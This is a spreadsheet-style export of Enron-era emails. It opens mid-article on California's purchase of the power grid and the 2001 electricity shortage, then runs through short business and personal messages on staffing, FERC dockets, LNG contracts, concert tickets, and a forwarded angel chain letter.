The $2.76 billion price tag for the Edison lines is about 2.3 times the their _x000D_
book value -- the base worth used by regulators to set rates of return. _x000D_
If PG&amp;E and SDG&amp;E reach similar deals with the governor, the cost of _x000D_
acquiring some 32,000 miles of transmission lines could reach $7.4 billion -- _x000D_
too much, some consumer advocates worry, to make the transaction a good deal _x000D_
for ratepayers. _x000D_
Public ownership of the grid would give the state a powerful hand in dealing _x000D_
with federal energy regulators, who so far have refused to rein in power _x000D_
generators, consumer groups say. _x000D_
The acquisition also would curtail unnecessary additions to the system, _x000D_
investments that provide guaranteed profits to the current owners, activists _x000D_
say. _x000D_
"The state isn't looking to make money expanding the system," said Michael _x000D_
Shames of the Utility Consumers' Action Network. "The state can establish a _x000D_
policy that says no new grid will be built where distributed generation can _x000D_
substitute." _x000D_
But many experts believe that even as microturbines, fuel cells, windmills, _x000D_
solar power and more cogeneration plants take root in coming years, the grid _x000D_
will be needed to deliver surplus power to other places that can use it. _x000D_
Without having ways to move power from place to place, a major benefit of _x000D_
distributed generation would fall by the wayside. _x000D_
"The only way small assets are useful is if they can be shared when some _x000D_
power isn't needed, and you can't do that without a grid," said Mark P. _x000D_
Mills, an energy consultant and co-editor of the Digital Power Report. _x000D_
"The grid becomes more important the more you distribute things." _x000D_
Nancy Floyd is a co-founder of Nth Power, a San Francisco venture capital _x000D_
group that seeks investment opportunities in utility innovations -- _x000D_
particularly the transmission and distribution of electricity. _x000D_
Five years ago, the firm had $50 million to spend. By 1999, the investment _x000D_
pool had climbed to $350 million. Last year, the company portfolio soared to _x000D_
$1 billion. _x000D_
"This is an area that's attracting a lot of capital, which means you're going _x000D_
to have a steady stream of new products and services," Floyd said. "That is _x000D_
the bright side of deregulation." _x000D_
Pure Energy Corp. of Syracuse, N.Y., has operated the Iceoplex cogeneration _x000D_
plant in Escondido since 1994. It sells its 50 or so megawatts to SDG&amp;E, _x000D_
which transmits the power over the grid for use by its customers. _x000D_
The firm has been floating plans to double capacity at the plant just east of _x000D_
Interstate 15, but company executive Jack Wolf said a ruling by California _x000D_
regulators last week has him rethinking expansion plans. _x000D_
Adding new turbines or cogeneration plants can rub neighbors the wrong way. _x000D_
Smokestacks billow out steam, which some residents say is unsightly even if _x000D_
the plume of white is only harmless water vapors. _x000D_
Wolf said his company met several times with Escondido residents to iron out _x000D_
concerns about boosting capacity at the Iceoplex. _x000D_
"If you're doing something like (expanding), you've got to meet with the _x000D_
communities, understand what their concerns are and work with them," Wolf _x000D_
said. _x000D_
Taxpayer advocates, meanwhile, do not worry whether the grid will remain _x000D_
viable over the next decade or two. Instead, they fear the government _x000D_
takeover of an aging network of poles and wires. _x000D_
"You're going to be socializing a massive infrastructure," said Jonathan _x000D_
Coupal, director of legal affairs for the Howard Jarvis Taxpayers _x000D_
Association. _x000D_
"The state of California can't even maintain the damn roads," he said. "Now _x000D_
we're going to be taking on not only the purchase but the ongoing maintenance _x000D_
of a huge infrastructure?" _x000D_
At the National Renewable Energy Laboratory in Golden, Colo., researchers _x000D_
work to improve the efficiency of alternative energy programs and promote _x000D_
their use among mainstream consumers. _x000D_
But even as workplaces and neighborhoods across the country move toward _x000D_
supplying their own power, the transmission system will remain a vital part _x000D_
of the network that delivers electricity from place to place, experts say. _x000D_
"Will the grid be obsolete in 20 years? Absolutely not. Things don't move _x000D_
that fast," said George Douglas of the National Renewable Energy Laboratory. _x000D_
"But we need to be forward-looking. _x000D_
"If each office park and subdivision has its own power source, that doesn't _x000D_
mean you don't want them linked, because things do fail." _x000D_
Stanford S. Penner, director of the UCSD Center for Energy Research, is _x000D_
convinced that the power grid will remain critical for decades to come. _x000D_
History has shown that implementing new technology takes far longer than _x000D_
inventing it, he said. _x000D_
"The turnover by a new technology has usually taken 40 to 50 years," he said. _x000D_
"Twenty years from now, they will still be relying on the transmission lines. _x000D_
Forty years from now, they may be starting to phase them out."_x000D_
------------------------------------------------------------------------------_x000D_
--_x000D_
_x000D_
This Summer, Power-Hungry U.S. May Feel West's Pain _x000D_
_x000D_
By ERIC SLATER, Times Staff Writer _x000D_
_x000D_
?????CHICAGO--California's electricity meltdown has been so spectacular that, _x000D_
until recently, much of the rest of the country was sitting back, feet up, _x000D_
watching the rolling-blackout show on television._x000D_
?????No longer. As summer approaches, utility operators across the nation are _x000D_
scrambling to shore up their own systems, many of which are themselves in the _x000D_
murky middle of deregulation and in varying states of neglect and disrepair._x000D_
?????In Chicago, the recently overwhelmed power provider actually advises _x000D_
competitors on where to build power plants. In New York City, officials say _x000D_
the difference between light and dark this summer may be 11 mini-generators. _x000D_
And in states from Arkansas to North Carolina, legislators are watching _x000D_
California's deregulation fiasco and slamming the brakes on their own plans._x000D_
?????The West is bound to suffer the most this summer, experts agree, but _x000D_
it's going to feel long and hot across much of the rest of the country, _x000D_
whether it really is or not. And with the economy already sputtering, the _x000D_
largest power shortage since the Arab oil embargo of 1973 could be nudging _x000D_
the country toward recession._x000D_
?????"Pray for continuous clouds," advised San Francisco-based energy _x000D_
consultant Edward Kahn._x000D_
?????A good word for cheaper gasoline in the Midwest, strong backs for coal _x000D_
miners in the South and lower natural gas prices from coast to coast might be _x000D_
in order as well._x000D_
?????In the U.S., electricity flows a bit like water in that the two largest _x000D_
grids separate roughly along the Continental Divide. Power generated in the _x000D_
West stays there, for the most part, and likewise the juice in the East. _x000D_
(Texas has its own grid.)_x000D_
?????With California, the world's sixth-largest economy, continuing to _x000D_
founder after its steady diet of deregulation mistakes, the other 10 mostly _x000D_
rural states in the Western grid are likely to suffer as well. As Rep. Jay _x000D_
Inslee (D-Wash.) put it: "You can, today, see blackouts coming, big as life, _x000D_
and an energy crisis going into the fall."_x000D_
?????The Eastern Interconnect, however, is larger than its Western sibling, _x000D_
more diverse in its sources and more complex in its physical structure, and _x000D_
thereby protected from some Western-style utility woes. But, from a serious _x000D_
transmission-line bottleneck near Eau Claire, Wis., to a 28-year-old Florida _x000D_
law that some say is stifling much-needed growth, the Eastern grid has its _x000D_
own kinks, soft spots and weaknesses._x000D_
?????If things start getting out of hand on this side of the Rockies, the _x000D_
first fissure is likely to appear in the last place a fissure is needed: New _x000D_
York._x000D_
?????When rates for many California customers shot up by as much as 46% last _x000D_
week, New Yorkers could commiserate. They have seen their rates rise 40% _x000D_
since 1999. A sweltering July or August could send prices up an additional _x000D_
50%, some analysts predict. As in California, New York has deregulated its _x000D_
power industry, so the market, not the state, sets the price. And as in _x000D_
California, New York is heavily dependent on natural gas to fire its _x000D_
generators--a commodity whose price has skyrocketed recently._x000D_
?????New York, again like California, also fell behind in the construction of _x000D_
new plants--the last one going up in 1995--even as demand was growing _x000D_
dramatically._x000D_
?????Now the city's power provider, Consolidated Edison, figures it has a _x000D_
thin insulation of extra kilowatts to get it through the summer--unless it's _x000D_
a bad one. Just in case, Con Ed wants to sprinkle the 11 mini-generators _x000D_
throughout the city. Environmentalists, concerned about the air pollutants _x000D_
the generators will kick out, have already filed suit to stop the plan._x000D_
?????Upstate New York has electricity surpluses ready to sell to the Big _x000D_
Apple. So does the nearby PJM (Pennsylvania, New Jersey, Maryland) _x000D_
Interconnection, which serves more than 22 million customers along the _x000D_
Eastern Seaboard and has deregulated cautiously and effectively._x000D_
?????But "New York City--even assuming those generators come on line--is _x000D_
going to be nip-and-tuck," said Bill Brier, vice president of Edison Electric _x000D_
Institute, which represents private utilities. _x000D_
?????The reason: Transmission bottlenecks make it all but impossible for the _x000D_
city to import power on especially bad days. The Eastern grid is a much more _x000D_
intricate web than that in the West, a mesh of more and smaller lines _x000D_
ferrying electricity to a more evenly distributed population. But _x000D_
deregulation has fundamentally changed how the grid is used without preparing _x000D_
it for its new free-market role._x000D_
?????Constructed as a heavily regulated series of channels for efficiently _x000D_
floating power from one utility with extra power to another in need, the grid _x000D_
is now open to private electricity merchants who sell to the highest bidder. _x000D_
In 1996, 25,000 transactions took place on the grid, according to the Edison _x000D_
institute. By 1999, that figure had rocketed to 2 million._x000D_
?????"That," said Brier, "is why you're having more and more bottlenecks in _x000D_
the system."_x000D_
?????While deregulation has forced utilities to open up their transmission _x000D_
lines to competitors, it has also allowed the marketplace--rather than _x000D_
need--to dictate where new lines are strung._x000D_
?????In Minnesota, state officials would like new lines to come in from the _x000D_
west and north, bringing cheap power from the Dakotas and Canada. But _x000D_
Minnesota utilities would rather build lines in the opposite direction, _x000D_
enabling them to sell power to Chicago and Milwaukee for perhaps twice the _x000D_
price they're getting from Minnesota customers._x000D_
?????Of course, the utilities are running into the problem that always _x000D_
accompanies proposed construction of 13-story metal towers buzzing with _x000D_
megawatts: massive public opposition. In Wisconsin, a powerful grass-roots _x000D_
group called Save Our Unique Lands calls one proposed line a "250-mile scar" _x000D_
and points out that the line would go primarily to benefit not Wisconsinites _x000D_
but their oft-derided urban neighbors, Chicagoans._x000D_
?????Just two years ago, Chicago, not California, was the daytime nightmare _x000D_
of the electrical world. A summer of blackouts large and small began in July, _x000D_
when more than 100,000 customers lost power on a 104-degree day, and _x000D_
continued on and off for weeks, with 30 blocks of the central business _x000D_
district going black for hours one Thursday afternoon._x000D_
?????Mayor Richard M. Daley went ballistic when Commonwealth Edison revealed _x000D_
it couldn't warn of rolling blackouts because it wasn't sure how its _x000D_
byzantine cable system works. After hundreds of millions of dollars in _x000D_
upgrades, Chicago will still be vulnerable to blackouts this summer. But the _x000D_
outages will be isolated problems of overload or mechanical breakdown, not _x000D_
the systemic failures likely in the West._x000D_
?????In Illinois, restructuring that began in 1997 has gone relatively _x000D_
smoothly, and the state and m</t>
  </si>
  <si>
    <t>Sun, 8 Jul 2001 07:18:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ann.cohn@sce.com'})</t>
  </si>
  <si>
    <t>Re: Technical Working Group</t>
  </si>
  <si>
    <t>Apologies folks, but upon re-reading, I caught some ambiguities and _x000D_
inaccuracies in the first draft that I sent around.  Sure that  errors _x000D_
remain, but this version should at least be somewhat closer.  Changes are in _x000D_
strike-out-underline._x000D_
_x000D_
Best,_x000D_
Jeff</t>
  </si>
  <si>
    <t>Tue, 6 Jun 2000 10:40:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">Mark, you have this one!_x000D_
Regards_x000D_
Delainey_x000D_
---------------------- Forwarded by David W Delainey/HOU/ECT on 06/06/2000 _x000D_
05:40 PM ---------------------------_x000D_
_x000D_
_x000D_
Janet R Dietrich_x000D_
06/06/2000 04:01 PM_x000D_
To: Mark E Haedicke/HOU/ECT@ECT, David W Delainey/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Chris Gaffney_x000D_
_x000D_
_x000D_
I just heard that Chris Gaffney is transferring to the Toronto office. His _x000D_
skill sets/capabilities have been critical in the closing of both the UI and _x000D_
NSTAR deals and he has been actively engaged in the long-term NSTAR deal, _x000D_
Con-Ed, and our Project Green Jacket. It is critical to our business to have _x000D_
no transitional period with attorneys and I expect his replacement to be _x000D_
fully up to speed (i.e. knowledge of the power market, understanding of _x000D_
structured power transactions, etc) relative to definitive documents around _x000D_
these transactions. Chris is definitely a loss to our team. Please advise as _x000D_
to his qualified replacement on these specific deals.  Thanks. _x000D_
</t>
  </si>
  <si>
    <t>Wed, 28 Mar 2001 17:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Platts Energy Trader Free Trial  March 29, 2001 Edition</t>
  </si>
  <si>
    <t>Today's complimentary issue of Platts Energy Trader is attached. If you have _x000D_
any  questions or would like to subscribe now, call  877-286-8897 or _x000D_
212-904-2004; e-mail,  info@platts.com. Meanwhile, we hope you enjoy today's _x000D_
issue of Platts Energy Trader._x000D_
_x000D_
If you need to download Acrobat Reader to read this file, go to www.adobe.com._x000D_
_x000D_
To stop the free trial, hit reply and type "stop trial."_x000D_
_x000D_
_x000D_
_x000D_
 - et032901.pdf</t>
  </si>
  <si>
    <t>Thu, 27 Sep 2001 08:46:35 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'nancy.bagot@enron.com', 'joe.hartsoe@enron.com'})</t>
  </si>
  <si>
    <t>FERC Discussion on OFOs</t>
  </si>
  <si>
    <t xml:space="preserve">Per Jan's recent Commission meeting summary I just noticed the Commission had added a discussion item on OFOs.  They didn't get to this at yesterday's meeting, but will take up on Oct. 11.  Help Joe -- what is this about?  Is there some possibility of the FERC curbing our ability to use OFOs?  This is an absolutely critical tool for us to keep -- even though we seldom use.  Where/when can we make our case._x000D_
RE:_x000D_
G-33. DOCKET# GX01-1 000 Discussion of Gas Pipeline Operational Flow Orders </t>
  </si>
  <si>
    <t>Thu, 5 Apr 2001 09:09:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jimmy.simien@enron.com'})</t>
  </si>
  <si>
    <t>Nice Rugby Story</t>
  </si>
  <si>
    <t xml:space="preserve">I heard about this last week...pretty nasty_x000D_
PL_x000D_
_x000D_
---------------------- Forwarded by Phillip M Love/HOU/ECT on 04/05/2001 _x000D_
04:09 PM ---------------------------_x000D_
_x000D_
_x000D_
Bryan Hull_x000D_
04/05/2001 03:56 PM_x000D_
To: Phillip M Love/HOU/ECT@ECT, Matthew Lenhart/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Nice Rugby Story_x000D_
_x000D_
Is this why you play rugby?_x000D_
_x000D_
http://dailynews.yahoo.com/h/po/20010404/co/rugger_resigns_over_rectal_fouls_1_x000D_
.html_x000D_
</t>
  </si>
  <si>
    <t>Mon, 2 Apr 2001 07:32:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">no not necessarily... just sick of her at the moment,_x000D_
_x000D_
_x000D_
From: Margaret Allen@ENRON on 04/02/2001 01:32 PM_x000D_
To: John Arnold/HOU/ECT@ECT_x000D_
cc:  _x000D_
Subject: Re:   _x000D_
_x000D_
what a pisser -- i'm still in austin so i can't go.  what about your _x000D_
girlfriend?  is she on her way out?_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
	John Arnold@ECT_x000D_
	04/02/2001 12:25 PM_x000D_
		 _x000D_
		 To: Margaret Allen/Corp/Enron@ENRON_x000D_
		 cc: _x000D_
		 Subject: _x000D_
_x000D_
i may have some u2 tix for tonight,   wanna go?_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 15 Nov 2001 13:00:47 -0800 (PST)</t>
  </si>
  <si>
    <t>FW: TBC - Pipeline Right-of-Way Agreement</t>
  </si>
  <si>
    <t>_x000D_
_x000D_
-----Original Message-----_x000D_
From: Wayne Sneed [mailto:wsneed@tum.com]_x000D_
Sent: Thursday, November 15, 2001 2:31 PM_x000D_
To: Rainer, Eva_x000D_
Subject: TBC - Pipeline Right-of-Way Agreement_x000D_
_x000D_
_x000D_
Eva,_x000D_
_x000D_
           Here is  the pipeline right-of-way agreement that we have been_x000D_
talking about.  I just received it.  I haven't even read it yet, but it at_x000D_
least gives us something to work with.  Call me after you have had a chance_x000D_
to digest it.   Let's keep this thing moving._x000D_
---------------------- Forwarded by Wayne Sneed/UNITED on 11/15/2001 02:23_x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
"Ollie Easter" &lt;ollie.easter@chamberlainlaw.com&gt; on 11/15/2001 02:21:07 PM_x000D_
_x000D_
To:   &lt;Wsneed@tum.com&gt;_x000D_
cc:_x000D_
Subject:  TBC - Pipeline Right-of-Way Agreement_x000D_
_x000D_
_x000D_
Please see attached Agreement._x000D_
_x000D_
This communication may be protected by the attorney/client privilege and_x000D_
may contain confidential information intended only for the person to whom_x000D_
it is addressed.  Any views or opinions expressed are solely those of the_x000D_
author and do not necessarily represent those of Chamberlain, Hrdlicka,_x000D_
White, Williams and Martin.  Any use, dissemination, forwarding, printing,_x000D_
or copying of this e-mail without consent of the originator is strictly_x000D_
prohibited.  If you have received this e-mail in error, please immediately_x000D_
notify Ollie M. Easter by telephone at (713) 658-1818._x000D_
_x000D_
_x000D_
(See attached file: #341421 v2 - Texas Brine - Pipeline Right of Way_x000D_
Agreement.doc)</t>
  </si>
  <si>
    <t>Sat, 10 Jun 2000 03:22:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'anshuman.srivastav@enron.com'})</t>
  </si>
  <si>
    <t>Re: LNG Contracts</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Mary,_x000D_
_x000D_
Sorry about not getting in touch with you earlier. (Just checked my e-mail) _x000D_
Unfortunately I will be out of Houston this weekend and will be headed back _x000D_
to India. Hence i will not be able to meet with you. I am looking into the _x000D_
commercial aspect of the LNG contracts and hence would like to discuss your _x000D_
plans. Can we still do this over the phone??_x000D_
_x000D_
Sorry again, about not getting in touch with you._x000D_
_x000D_
Regards,_x000D_
_x000D_
Anshuman_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mary Solmonson@ECT_x000D_
06/09/2000 11:59 PM_x000D_
To: Anshuman Srivastav/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT_x000D_
cc: Sally Beck/HOU/ECT@ECT, Scott Earnest/HOU/ECT@ECT _x000D_
_x000D_
Subject: Re: LNG Contracts_x000D_
_x000D_
I would like to visit with you while you are here in Houston.  You may _x000D_
contact me at x3-6079 and we can arrange a time to meet._x000D_
_x000D_
---------------------- Forwarded by Mary Solmonson/HOU/ECT on 06/09/2000 _x000D_
01:27 PM ---------------------------_x000D_
_x000D_
Heidi Hellmann@ENRON_DEVELOPMENT_x000D_
_x000D_
06/09/2000 07:34 PM_x000D_
_x000D_
To: Mary Solmonson/HOU/ECT@ECT_x000D_
cc: Anshuman Srivastav/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Sandeep _x000D_
Katwala/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT _x000D_
Subject: Re: LNG Contracts  _x000D_
_x000D_
Mary,_x000D_
_x000D_
One of our team members, Anshuman Srivastav, is currently in Houston.  It _x000D_
would probably be useful for the 2 of you to meet, so that we can understand _x000D_
exactly what your plans are with regards to LNG and what exactly you will _x000D_
require as far as contracts go._x000D_
_x000D_
Failing that,  the person, who is the official keeper of all our contracts, _x000D_
is Sandeep Katwala.  He should be able to get you whatever you need._x000D_
_x000D_
Let me know if you have any difficulties and I can try and hunt stuff down._x000D_
_x000D_
Heidi_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Mary Solmonson@ECT_x000D_
06/08/2000 05:21 PM_x000D_
To: Rick Phillips/Corp/Enron@Enron, Stephen Wallace/Corp/Enron@ENRON, Gautam _x000D_
Dhar/Corp/Enron@Enron, Stephen Wallace/Corp/Enron@ENRON, Heidi _x000D_
Hellmann/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Milind _x000D_
Laad/ENRON_DEVELOPMENT@ENRON_DEVELOPMENT, Love Sharma/Corp/Enron@Enron_x000D_
cc:  _x000D_
_x000D_
Subject: LNG Contracts_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Mary Solmonson/HOU/ECT on 06/08/2000 _x000D_
05:18 PM ---------------------------_x000D_
_x000D_
_x000D_
Mary Solmonson_x000D_
06/08/2000 05:19 PM_x000D_
To: _x000D_
cc: Sally Beck/HOU/ECT@ECT, Scott Earnest/HOU/ECT@ECT _x000D_
Subject: LNG Contracts_x000D_
_x000D_
I am seeking information on where to find copies of LNG Contracts that were _x000D_
previously in the domain of the old Enron International company.   Enron _x000D_
North America will be establishing a risk book to manage LNG positions on a _x000D_
worldwide basis and we need copies of all contracts to set this up.  These _x000D_
contracts may or may not be related to the Dabhol project.  If you can _x000D_
provide guidance or information as to where to find these contracts, I would _x000D_
appreciate it.  You may respond via email or call me at 713-853-6079 in _x000D_
Houston._x000D_
_x000D_
Thank you for your attention._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 20 Jul 2001 14:15:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>Anadarko</t>
  </si>
  <si>
    <t xml:space="preserve"> _x000D_
 the gisb is ok and is not scheduled to be terminated _x000D_
_x000D_
Debra Perlingiere_x000D_
Enron North America Legal_x000D_
1400 Smith Street, EB 3885_x000D_
Houston, Texas 77002_x000D_
dperlin@enron_x000D_
713-853-7658_x000D_
713-646-3490 Fax_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Wed, 13 Sep 2000 04:03:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Fwd: Fw: (no subject)</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Darron C Giron/HOU/ECT on 09/13/2000 _x000D_
11:03 AM ---------------------------_x000D_
_x000D_
_x000D_
"KRISTI GIRON" &lt;KRISTI.GIRON@cfisd.net&gt; on 09/13/2000 07:54:41 AM_x000D_
To: &lt;Darron.C.Giron@enron.com&gt;_x000D_
cc:  _x000D_
Subject: Fwd: Fw: (no subject)_x000D_
_x000D_
_x000D_
Content-Transfer-Encoding: 7bit_x000D_
Received: from smtp.email.msn.com (cpimssmtpu08.email.msn.com _x000D_
[207.46.181.30]) by gpwise01.cfisd.net; Tue, 12 Sep 2000 22:43:38 -0500_x000D_
Received: from default - 63.28.143.18 by email.msn.com with Microsoft _x000D_
SMTPSVC;  Tue, 12 Sep 2000 20:43:06 -0700_x000D_
Message-ID: &lt;002b01c01d35$7f5198a0$128f1c3f@default&gt;_x000D_
From: "hollyw" &lt;hollyw@email.msn.com&gt;_x000D_
To: "KRISTI GIRON" &lt;KRISTI.GIRON@cfisd.net&gt;_x000D_
Subject: Fw: (no subject)_x000D_
Date: Tue, 12 Sep 2000 22:48:35 -0500_x000D_
MIME-Version: 1.0_x000D_
Content-Type: text/plain; charset="iso-8859-1"_x000D_
X-Priority: 3_x000D_
X-MSMail-Priority: Normal_x000D_
X-Mailer: Microsoft Outlook Express 5.00.2919.6600_x000D_
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600_x000D_
Return-Path: hollyw@email.msn.com_x000D_
_x000D_
mushy crap, mushy crap.............but I love you so here ya go._x000D_
_x000D_
----- Original Message -----_x000D_
From: &lt;EPeddi1254@cs.com&gt;_x000D_
To: &lt;NanSeas423@aol.com&gt;; &lt;charleep@email.msn.com&gt;; "mjp"_x000D_
&lt;mjp@hqhouston.com&gt;; &lt;Windy769@cs.com&gt;; &lt;kpeddicord@bce.katy.isd.tenet.edu&gt;;_x000D_
&lt;hollyw@email.msn.com&gt;_x000D_
Sent: Tuesday, September 12, 2000 5:36 PM_x000D_
Subject: (no subject)_x000D_
_x000D_
_x000D_
&gt; ou may have all seen this but is worth looking at again!!_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; Keep reading to the bottom of the page - don't stop_x000D_
&gt; &gt; &gt;&gt;       at the feet(You'll see)._x000D_
&gt; &gt; &gt;&gt;_x000D_
&gt; &gt; &gt;&gt;       THINGS AREN'T ALWAYS WHAT THEY SEEM_x000D_
&gt; &gt; &gt;&gt;_x000D_
&gt; &gt; &gt;&gt;       Two traveling angels stopped to spend the night in_x000D_
&gt; &gt; &gt;&gt;       the home of a wealthy family.  The family was rude_x000D_
&gt; &gt; &gt;&gt;       and refused to let the angels stay in the mansion's_x000D_
&gt; &gt; &gt;&gt;       guest room.  Instead the angels were given a small_x000D_
&gt; &gt; &gt;&gt;       space in the cold basement.  As they made their bed_x000D_
&gt; &gt; &gt;&gt;       on the hard floor, the older angel saw a hole in the_x000D_
&gt; &gt; &gt;&gt;       wall and repaired it.  When the younger angel asked_x000D_
&gt; &gt; &gt;&gt;       why, the older angel replied,_x000D_
&gt; &gt; &gt;&gt;_x000D_
&gt; &gt; &gt;&gt;       "Things aren't always what they seem"_x000D_
&gt; &gt; &gt;&gt;_x000D_
&gt; &gt; &gt;&gt;       The next night the pair came to rest at the house of_x000D_
&gt; &gt; &gt;&gt;       a very poor, but very hospitable farmer and his_x000D_
&gt; &gt; &gt;&gt;       wife._x000D_
&gt; &gt; &gt;&gt;_x000D_
&gt; &gt; &gt;&gt;       After sharing what little food they had the couple_x000D_
&gt; &gt; &gt;&gt;       let the angels sleep in their bed where they could_x000D_
&gt; &gt; &gt;&gt;       have a good night's rest.  When the sun came up the_x000D_
&gt; &gt; &gt;&gt;       next morning the angels found the farmer and his_x000D_
&gt; &gt; &gt;&gt;       wife in tears.  Their only cow, whose milk had been their_x000D_
&gt; &gt; &gt;&gt;       sole income, lay dead in the field.  The younger_x000D_
&gt; &gt; &gt;&gt;       angel was infuriated and asked the older angel, "How could_x000D_
&gt; &gt; &gt;&gt;       you have let this happen?  The first man had everything,_x000D_
&gt; &gt; &gt;&gt;       yet you helped him," she accused.  "The second family had_x000D_
&gt; &gt; &gt;&gt;       little but was willing to share everything,_x000D_
&gt; &gt; &gt;&gt;       and you let the cow die."_x000D_
&gt; &gt; &gt;&gt;_x000D_
&gt; &gt; &gt;&gt;       "Things aren't always what they seem,"_x000D_
&gt; &gt; &gt;&gt;       the older angel replied._x000D_
&gt; &gt; &gt;&gt;_x000D_
&gt; &gt; &gt;&gt;       "When we stayed in the basement of the mansion, I_x000D_
&gt; &gt; &gt;&gt;       noticed there was gold stored in that hole in the_x000D_
&gt; &gt; &gt;&gt;       wall.  Since the owner was so obsessed with greed and_x000D_
&gt; &gt; &gt;&gt;       unwilling to share his good fortune, I sealed the_x000D_
&gt; &gt; &gt;&gt;       wall so he  wouldn't find it._x000D_
&gt; &gt; &gt;&gt;_x000D_
&gt; &gt; &gt;&gt;       "Then last night as we slept in the farmers bed, the_x000D_
&gt; &gt; &gt;&gt;       angel of death came for his wife._x000D_
&gt; &gt; &gt;&gt;       I gave him the cow instead._x000D_
&gt; &gt; &gt;&gt;_x000D_
&gt; &gt; &gt;&gt;       "Things aren't always what they seem."_x000D_
&gt; &gt; &gt;&gt;_x000D_
&gt; &gt; &gt;&gt;       Sometimes that is exactly what happens when things_x000D_
&gt; &gt; &gt;&gt;       don't turn out the way they should.  If you have_x000D_
&gt; &gt; &gt;&gt;       faith, you just need to  trust that every outcome is always_x000D_
&gt; &gt; &gt;&gt;       to your advantage.  You might not know  it until some_x000D_
&gt; &gt; &gt;&gt;       time later..._x000D_
&gt; &gt; &gt;&gt;_x000D_
&gt; &gt; &gt;&gt;                                                Oooo_x000D_
&gt; &gt; &gt;&gt;                             Some people       (    )_x000D_
&gt; &gt; &gt;&gt;                          come into our lives   )  /_x000D_
&gt; &gt; &gt;&gt;                           and quickly go..    (_ /_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt;_x000D_
&gt; &gt; &gt;&gt;_x000D_
&gt; &gt; &gt;&gt;                                         oooO_x000D_
&gt; &gt; &gt;&gt;                                        (    )   Some people_x000D_
&gt; &gt; &gt;&gt;                                         \  (    become friends_x000D_
&gt; &gt;                                               and stay awhile._x000D_
&gt; &gt;_x000D_
&gt; &gt;                              \_)_x000D_
&gt;_x000D_
&gt;                                leaving beautiful      Oooo_x000D_
&gt;                                footprints on our      (    )_x000D_
&gt;                                hearts..                )  /_x000D_
&gt;_x000D_
&gt;                                                       (_/_x000D_
&gt; &gt; &gt;&gt;                                          oooO_x000D_
&gt; &gt; &gt;&gt;                                         (    )   and we are_x000D_
&gt; &gt;                                        \  (   never quite the_x000D_
&gt; &gt; &gt;&gt;                                                 same because we_x000D_
&gt;                                                \_)   have made a good_x000D_
&gt; &gt; &gt;&gt;                                                 friend !!_x000D_
&gt; &gt;                                                        &gt;&gt;_x000D_
&gt; &gt;                                         &gt;&gt;_x000D_
&gt; &gt; &gt;&gt;       Yesterday is history.  Tomorrow a mystery._x000D_
&gt; &gt; &gt;&gt;       Today is a gift.  That's why it's called the_x000D_
&gt; &gt; &gt;&gt;       present!_x000D_
&gt; &gt; &gt;&gt;       I think this is special...live and savor every_x000D_
&gt; &gt; &gt;&gt;       moment..._x000D_
&gt; &gt; &gt;&gt;       This is not a dress rehearsal!_x000D_
&gt; &gt; &gt;&gt;_x000D_
&gt; &gt; &gt;&gt;                             (\       /)_x000D_
&gt; &gt; &gt;&gt;                             ( \  _  / )_x000D_
&gt; &gt; &gt;&gt;                             (  \( )/  )_x000D_
&gt; &gt; &gt;&gt;                             (   / \   )  TAKE THIS LITTLE ANGEL_x000D_
&gt; &gt; &gt;&gt;                              (  \ /   )   AND KEEP HER CLOSE TO_x000D_
&gt; &gt;                                         YOU_x000D_
&gt; &gt; &gt;&gt;                               /      \    SHE IS YOUR GUARDIAN_x000D_
&gt; &gt;                                         ANGEL_x000D_
&gt; &gt; &gt;&gt;                              (        )    SENT TO WATCH OVER YOU_x000D_
&gt; &gt; &gt;&gt;                               ~~~~~~~~_x000D_
&gt; &gt; &gt;&gt;       THIS IS A SPECIAL GUARDIAN ANGEL... YOU MUST PASS_x000D_
&gt; &gt; &gt;&gt;       THIS_x000D_
&gt; &gt; &gt;&gt;_x000D_
&gt; &gt; &gt;&gt;       ON TO 5 PEOPLE  WITHIN THE HOUR OF RECEIVING_x000D_
&gt; &gt; &gt;&gt;       HER..AFTER YOU DO MAKE A WISH....IF YOU HAVE PASSED HER ON,_x000D_
&gt; &gt; &gt;&gt;       YOUR WISH WILL BE GRANTED AND SHE WILL WATCH OVER_x000D_
&gt; &gt; &gt;&gt;       YOU FOREVER...._x000D_
&gt; &gt; &gt;&gt;       IF NOT..HER TEARS WILL FLOW AND NO WISHES WILL BE_x000D_
&gt; &gt; &gt;&gt;       GRANTED...._x000D_
&gt; &gt; &gt;&gt;      Now don't delete this message, because it comes_x000D_
&gt; &gt; &gt;&gt;       from a very special angel._x000D_
&gt; &gt; &gt;&gt;_x000D_
&gt; &gt; &gt;&gt;       Right Now -_x000D_
&gt; &gt; &gt;&gt;_x000D_
&gt; &gt; &gt;&gt;       -somebody is very proud of you._x000D_
&gt; &gt; &gt;&gt;       -somebody is thinking of you._x000D_
&gt; &gt; &gt;&gt;       -somebody is caring about you._x000D_
